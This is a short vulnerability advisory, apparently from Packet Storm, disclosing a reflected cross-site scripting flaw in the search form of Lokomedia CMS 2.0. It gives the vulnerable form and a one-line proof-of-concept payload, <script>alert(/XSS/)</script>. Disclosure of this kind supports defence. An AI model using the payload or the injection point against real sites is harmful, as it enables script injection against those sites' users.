Lokomedia CMS 2.0 Cross Site Scripting

2010-05-20T00:00:00
ID PACKETSTORM:89712
Type packetstorm
Reporter Andrea Bocchetti
Modified 2010-05-20T00:00:00

Description

                                        
                                            `  
  
# [x] Author: Andrea Bocchetti   
# [x] Homepage : www.geekit.it  
  
  
// Software Info   
# [x] Vendor : http://bukulokomedia.com/home  
CMS : Lokomedia CMS  
# [x] Version: [2.0]  
  
  
  
  
[#]-------------------------------------------------------------------------------------------[#]  
#  
# [x] Bug :   
  
  
<form method=POST action='hasil-pencarian.html'>   
<input name=kata type=text size=17 />   
<input type=submit value=Go />   
</form>   
  
Exploit:  
  
# just enter the form <script>alert(/XSS/)</script> to exploit the XSS   
#  
  
`